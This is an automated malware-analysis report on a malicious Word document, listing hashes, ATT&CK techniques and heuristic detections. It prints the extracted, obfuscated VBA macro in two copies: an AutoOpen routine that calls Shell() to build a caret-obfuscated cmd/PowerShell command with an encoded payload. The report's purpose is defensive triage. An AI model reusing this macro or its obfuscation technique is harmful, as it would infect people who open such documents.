Office (OLE) malware analysis — malicious · 0cb0fc88c3e37502

MALICIOUS

Office (OLE)

105.8 KB Created: 2018-06-05 22:34:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 47d94a02c9f91b1d818c5b5119522da2 SHA-1: f9c34ed106b5bfa637130c8fd3d07aa844d58a1e SHA-256: 0cb0fc88c3e37502f575bdf4afe56e35bf0598bc03152d220ccab1dbbe756d3a

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that calls Shell(). The Shell() function is used to execute a command string that appears to be constructing a command to download and execute a payload. The reconstructed command string is 'md DSiATmiSSHh COXCOLhtNQwLqEQwYn Pmqj QcJACzKDOcqO s & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c '. This indicates a downloader or droppper functionality.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11887 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11887 bytes
SHA-256: `486e6cbe6f2bf23d9bddb2ded1ba04f7dfc406813a5a5e2158a1772cc580a231`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ucLncQKUY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function FMmNtW() On Error Resume Next SjOVh = Hex(HQLfJ + Hex(ZzsswD) * 22012 + Round(uvMqwU)) kXBzjt = Cos(wWUtBN) zOjiT = CDate(zciJnM) IXTYYN = Cos(WsJha) lzVYC = Hex(wUuhj + Hex(dXsIo) * 83817 + Round(WEfaD)) VnwzGE = Cos(EOKwGK) kOUNp = CDate(LupWOD) XDzFY = Cos(bhOzW) FMmNtW = WnzQtcEjRi + Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + EmJIoomFn + jWpQrziTL + lQTMpXdzOkW + ohlkiCjO + OPdijVXMK, 56800 - 56800) diIPNt = Hex(ikZHj + Hex(kQlaz) * 53832 + Round(ClaAPF)) niZWP = Cos(aMECfc) MZhwvP = CDate(nCqGQX) krHIzH = Cos(OvKDs) End Function Sub Autoopen() On Error Resume Next rYMiuV = Hex(XdDcEz + Hex(mlsTF) * 83607 + Round(pVwuf)) IwdXu = Cos(iwPqH) vYPHn = CDate(DAqhcC) wBZCCP = Cos(OzqYzj) FMmNtW BUUXvl = Hex(JTwhi + Hex(qfibW) * 52036 + Round(wCFuMa)) zvhrH = Cos(wCfVK) RkoidU = CDate(zzjVP) YAlwP = Cos(KURJNl) End Sub Attribute VB_Name = "abVozIQ" Function HjcVNTZJ() On Error Resume Next upAobt = Hex(CcUrU + Hex(HJnaw) * 7179 + Round(BtUSf)) KVqDh = Cos(zDafF) CniwLz = CDate(TGRrl) FcjvA = Cos(hJPiB) fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj" YniUR = Hex(iizuQu + Hex(iVuLF) * 85264 + Round(EfbjPI)) KXQmE = Cos(jnLpzo) NDYLMo = CDate(SwnzJq) ItMCF = Cos(GTKjH) VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s & %^c^o^" + "m^S^p^E^c^% " + " %^c^o^m^S^p^E^" + "c^% /V " + " " + "/c " + " " RUvKF = Hex(QHQAG + Hex(TaRHL) * 69144 + Round(dOFbt)) ntjits = Cos(DBXWXo) ltjHHm = CDate(iirzHa) iwLsB = Cos(RSkcW) NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk" RMSDv = Hex(XBhkfw + Hex(GDEPp) * 59621 + Round(RZZELd)) dQTIG = Cos(wVjPav) kZiuR = CDate(XuHMC) zjqsmO = Cos(ROtlOb) TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF" NVlTp = Hex(tPBsqf + Hex(wFbVDQ) * 24559 + Round(BHczB)) dBqnUS = Cos(ABJoXN) ihwBH = CDate(tLmXhw) PLOIV = Cos(GPOLEW) MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%" szESj = Hex(CKaTJb + Hex(YpSOSG) * 42720 + Round(ionAS)) HmTWtf = Cos(jvHUqB) EosEhf = CDate(Rzzsw) JOJQR = Cos(zuXGw) fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc" vvptK = Hex(bEazpv + Hex(SnTqpU) * 59109 + Round(flVmrD)) DAjhwo = Cos(jaXmGQ) ZJYNjw = CDate(dEimRU) KUHSq = Cos(BZSHzu) XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&" HjcVNTZJ = fKhwzQizd + VAJYZkXwPzO + NYHtZWM + TTzOkRwM + MJAjq + fwCRdDF + XnOcmFF End Function Function JLzDCqBTAP() On Error Resume Next DtSCOO = Hex(FbwYK + Hex(Cawzv) * 58669 + Round(VZGQU)) RszrQ = Cos(mRXkl) YDRKjX = CDate(IlwadV) VaLdm = Cos(iwzJG) BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn" fKYmip = Hex(RWbCK + Hex(ihLiUR) * 43749 + Round(DsLGt)) jzaFIE = Cos(sYjwSl) DqtXA = CDate(EUWUds) ObRMjl = Cos(bUwVuG) mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%! -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw" qJcfBj = Hex(SNzoF + Hex(tPbGc) * 30304 + Round(kQHWS)) tqjuXd = Cos(wNKtob) ivOSY = CDate(fzMsqt) kGZCFN = Cos(mOjTb) KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA" LJfEh = Hex(ADqpC + Hex(wqBwiq) * 8038 + Round(wJpoIn)) GaQLur = Cos(QVRHL) sbuRX = CDate(HWUqj) PwMBUr = Cos(tpudad) LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG" zlafi = Hex(iflXP + Hex(QvjFm) * 69596 + Round(SfuAO ... (truncated)

SHA-256: 486e6cbe6f2bf23d9bddb2ded1ba04f7dfc406813a5a5e2158a1772cc580a231

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ucLncQKUY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FMmNtW()
On Error Resume Next
SjOVh = Hex(HQLfJ + Hex(ZzsswD) * 22012 + Round(uvMqwU))
kXBzjt = Cos(wWUtBN)
zOjiT = CDate(zciJnM)
IXTYYN = Cos(WsJha)
lzVYC = Hex(wUuhj + Hex(dXsIo) * 83817 + Round(WEfaD))
VnwzGE = Cos(EOKwGK)
kOUNp = CDate(LupWOD)
XDzFY = Cos(bhOzW)
FMmNtW = WnzQtcEjRi + Shell(faMaBJJjko + Chr(iVdGfrhQWA + vbKeyC + OmBLzt) + HjcVNTZJ + JLzDCqBTAP + EmJIoomFn + jWpQrziTL + lQTMpXdzOkW + ohlkiCjO + OPdijVXMK, 56800 - 56800)
diIPNt = Hex(ikZHj + Hex(kQlaz) * 53832 + Round(ClaAPF))
niZWP = Cos(aMECfc)
MZhwvP = CDate(nCqGQX)
krHIzH = Cos(OvKDs)
End Function
Sub Autoopen()
On Error Resume Next
rYMiuV = Hex(XdDcEz + Hex(mlsTF) * 83607 + Round(pVwuf))
IwdXu = Cos(iwPqH)
vYPHn = CDate(DAqhcC)
wBZCCP = Cos(OzqYzj)
FMmNtW
BUUXvl = Hex(JTwhi + Hex(qfibW) * 52036 + Round(wCFuMa))
zvhrH = Cos(wCfVK)
RkoidU = CDate(zzjVP)
YAlwP = Cos(KURJNl)
End Sub


Attribute VB_Name = "abVozIQ"
Function HjcVNTZJ()
On Error Resume Next
upAobt = Hex(CcUrU + Hex(HJnaw) * 7179 + Round(BtUSf))
KVqDh = Cos(zDafF)
CniwLz = CDate(TGRrl)
FcjvA = Cos(hJPiB)
fKhwzQizd = "md DSiATmiSSHh" + " COXCO" + "LhtNQwLqEQwYn" + "Pmqj"
YniUR = Hex(iizuQu + Hex(iVuLF) * 85264 + Round(EfbjPI))
KXQmE = Cos(jnLpzo)
NDYLMo = CDate(SwnzJq)
ItMCF = Cos(GTKjH)
VAJYZkXwPzO = " QcJ" + "ACzKDOc" + "qO" + "s &     %^c^o^" + "m^S^p^E^c^%    " + " %^c^o^m^S^p^E^" + "c^%     /V   " + "      " + "/c       " + "   "
RUvKF = Hex(QHQAG + Hex(TaRHL) * 69144 + Round(dOFbt))
ntjits = Cos(DBXWXo)
ltjHHm = CDate(iirzHa)
iwLsB = Cos(RSkcW)
NYHtZWM = " set " + "%COuwU" + "RmVT" + "adiNVu%=RzMfkl" + "lBjq" + "&&se" + "t " + "%wHXXwwmpjLk"
RMSDv = Hex(XBhkfw + Hex(GDEPp) * 59621 + Round(RZZELd))
dQTIG = Cos(wVjPav)
kZiuR = CDate(XuHMC)
zjqsmO = Cos(ROtlOb)
TTzOkRwM = "%=p&&set %" + "zfVQCi" + "cQiHbnsP%=" + "o^w&&set %NF"
NVlTp = Hex(tPBsqf + Hex(wFbVDQ) * 24559 + Round(BHczB))
dBqnUS = Cos(ABJoXN)
ihwBH = CDate(tLmXhw)
PLOIV = Cos(GPOLEW)
MJAjq = "szzzpXuJtQSYw%=" + "zCfR" + "odQkw&&set %Ri" + "tDTuB%=!" + "%wH" + "XXwwm" + "pjLk%!&&set %ci" + "jIQc" + "sRiEjdVci%"
szESj = Hex(CKaTJb + Hex(YpSOSG) * 42720 + Round(ionAS))
HmTWtf = Cos(jvHUqB)
EosEhf = CDate(Rzzsw)
JOJQR = Cos(zuXGw)
fwCRdDF = "=p" + "bkaAhoiTojWO" + "&&set %Fh" + "nZnnZcE" + "lIf%=e^" + "r&&set %KzalpDU" + "LUTzc"
vvptK = Hex(bEazpv + Hex(SnTqpU) * 59109 + Round(flVmrD))
DAjhwo = Cos(jaXmGQ)
ZJYNjw = CDate(dEimRU)
KUHSq = Cos(BZSHzu)
XnOcmFF = "n%=!" + "%zfVQCicQiHbn" + "sP%!&&set %Wd" + "TRpSir%" + "=s&&set %Cjp" + "IAVVFPij" + "AznT%=obZBYwC" + "jJ&&set %MbFUn" + "wp%=he&"
HjcVNTZJ = fKhwzQizd + VAJYZkXwPzO + NYHtZWM + TTzOkRwM + MJAjq + fwCRdDF + XnOcmFF
End Function
Function JLzDCqBTAP()
On Error Resume Next
DtSCOO = Hex(FbwYK + Hex(Cawzv) * 58669 + Round(VZGQU))
RszrQ = Cos(mRXkl)
YDRKjX = CDate(IlwadV)
VaLdm = Cos(iwzJG)
BpsbQCULiZM = "&set %kfjRhIsmw" + "KX%=ll&&!%R" + "itDTuB%!!%Kz" + "alpDULUTzcn%!!%" + "Fhn"
fKYmip = Hex(RWbCK + Hex(ihLiUR) * 43749 + Round(DsLGt))
jzaFIE = Cos(sYjwSl)
DqtXA = CDate(EUWUds)
ObRMjl = Cos(bUwVuG)
mkXuiDTzTc = "ZnnZcElIf%!!" + "%WdTRpSir" + "%!!%MbFUnw" + "p%!!%kf" + "jRhIsmwK" + "X%!  -e IAAmA" + "CgAIAAkAHMASABl" + "AGwATABJ" + "AGQAWwAxAF0AKw"
qJcfBj = Hex(SNzoF + Hex(tPbGc) * 30304 + Round(kQHWS))
tqjuXd = Cos(wNKtob)
ivOSY = CDate(fzMsqt)
kGZCFN = Cos(mOjTb)
KCqkali = "AkAHMAaABF" + "AGwATA" + "BpAEQA" + "WwAxADMAX" + "QArAC" + "cAWAAnACkA" + "KABOAGUAdw" + "AtAE8AYgB" + "KAEUAQwB0ACAA" + "IABJA"
LJfEh = Hex(ADqpC + Hex(wqBwiq) * 8038 + Round(wJpoIn))
GaQLur = Cos(QVRHL)
sbuRX = CDate(HWUqj)
PwMBUr = Cos(tpudad)
LpDSwhYqL = "E8ALgBjAE8ATQ" + "BwAHIAZQB" + "TAFMAaQBvAG4A" + "LgBkAEUAR" + "gBMA" + "EEAVABFAHMAVABy" + "AGUAYQBtA" + "CgAIABb" + "AG"
zlafi = Hex(iflXP + Hex(QvjFm) * 69596 + Round(SfuAO
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.